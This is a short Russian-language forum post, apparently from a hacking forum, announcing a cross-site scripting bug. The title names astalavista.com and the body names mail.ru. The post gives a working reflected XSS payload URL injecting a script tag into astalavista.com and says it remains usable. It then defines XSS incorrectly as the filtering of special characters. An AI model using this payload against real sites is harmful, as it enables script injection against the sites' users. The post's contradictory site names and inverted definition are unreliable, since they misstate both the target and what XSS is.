• XSS.stack #1 – первый литературный журнал от юзеров форума

XSS на astalavista.com

Robin Gud

(L1) cache
Пользователь
Регистрация
25.02.2006
Сообщения
517
Реакции
5
Найден XSS баг на mail.ru. Найден совсем недавно, однако полностью работает на данный момент и есть возможность его использовать.
Код:
http://astalavista.com/index.php/"><script>alert("Special for xss.pro/");</script>
Источник

XSS - это фильтрация специальных символов во входном или выходном потоке. При этом традиционно фильтруются символы < >, а также " ' & %. Все эти символы имеют ASCII код меньший 128, и поэтому, в большинстве кодировок кодируются одним байтом, значение которого совпадает с ASCII-кодом символа.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх